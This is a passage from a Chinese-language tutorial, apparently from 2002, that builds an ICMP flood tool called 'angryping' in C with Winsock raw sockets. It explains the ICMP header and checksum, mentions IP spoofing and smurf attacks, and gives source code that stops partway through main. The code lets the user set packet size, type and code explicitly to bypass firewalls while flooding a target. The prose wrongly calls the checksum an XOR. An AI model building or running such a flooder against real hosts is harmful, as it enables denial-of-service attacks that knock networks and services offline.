2.icmp报文的声明

　　一个icmp报文包括ip头部、icmp头部和icmp报文，用ipproto_icmp创建这个类型的ip包，用以下结构填充：

typedef struct _ihdr
{
byte i_type; //8位类型
byte i_code; //8位代码
ushort i_cksum; //16位校验和
ushort i_id; //识别号
ushort i_seq; //报文序列号
ulong timestamp; //时间戳
}icmp_header;

　　这样我们就声明了一个icmp报文结构，就等后面的填充了。
　3.校验和

　　计算方法：先设置头校验和域的数值为0，然后对整个数据报头按每16位求异或，再把结果取反，就得到了校验和。

　　函数：

ushort checksum(ushort *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(ushort);
}
if(size )
{
cksum += *(uchar*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (ushort)(~cksum);
}

　　4.必须注意的问题

　　由于win98/me系统不支持ip-spoof，所以无法用setsockopt设置ip_hdrincl让用户自己填充ip头部，所以win98/me不能实现ip伪造！如果有人做的号称能伪造ip的工具而且又支持win98/me，那一定是吹出来的，因为这是系统限制，程序没法解决的。而且自己填充ip头部后，checksum就不是由系统计算了，这时候你的checksum计算函数就变成瓶颈了，这就是伪造ip后的flooder发送速度不够系统计算checksum的flooder快的原因了，除非优化过checksum函数。限于篇幅，采用ip-spoof技术的fakeping和smurf就不讨论了。

　　5.完整代码

　　做一个console application工程，输入下面的代码。如果优化得当，最终编译生成的exe也就4096字节而已，呵呵，just do it……

==================================================
/*
agp.c

angryping -- icmp flooder by hbu·小金(lk007)
copyright© 2002
e-mail:lk007@163.com
*/

#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "ws2_32.lib")
//头文件和库文件声明，如果不能编译，请在link里加上ws2_32.lib

#define false 0
#define true 1

#define seq 0x28376839

// 定义icmp首部
typedef struct _ihdr
{
byte i_type; //8位类型
byte i_code; //8位代码
ushort i_cksum; //16位校验和
ushort i_id; //识别号
ushort i_seq; //报文序列号
ulong timestamp; //时间戳
}icmp_header;

//计算校验和的子函数
ushort checksum(ushort *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(ushort);
}
if(size )
{
cksum += *(uchar*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (ushort)(~cksum);
}

int main(int argc, char **argv)
{
int datasize,errorcode,flag;
int timeout=2000, sendseq=0, packetsize=32,type=8,code=0,counter=0; //默认数据声明
char sendbuf[65535]={0}; //缓冲
wsadata wsadata;
socket sockraw=(socket)null;
struct sockaddr_in destaddr;
icmp_header icmp_header;
char destip[20]; //目标ip

if (argc<2)
{
printf("angryping by hbu-lk007\n");
printf("usage:%s [dest] <packetsize> <type> <code>\n",argv[0]);
//允许用户自定义数据包大小、类型、代码，用以绕过一些防火墙或做一些特殊的报文flood
exit(0);
}
strcpy(destip,argv[1]);
if (argc>2) packetsize=atoi(argv[2]); //取得数据大小
if (packetsize>65500)
{
printf("packet size must less than 65500\n"); //太大会无法生成ip数据报的
exit(0);
}

if (argc>3) type=atoi(argv[3]); //取得类型值
if (type>16)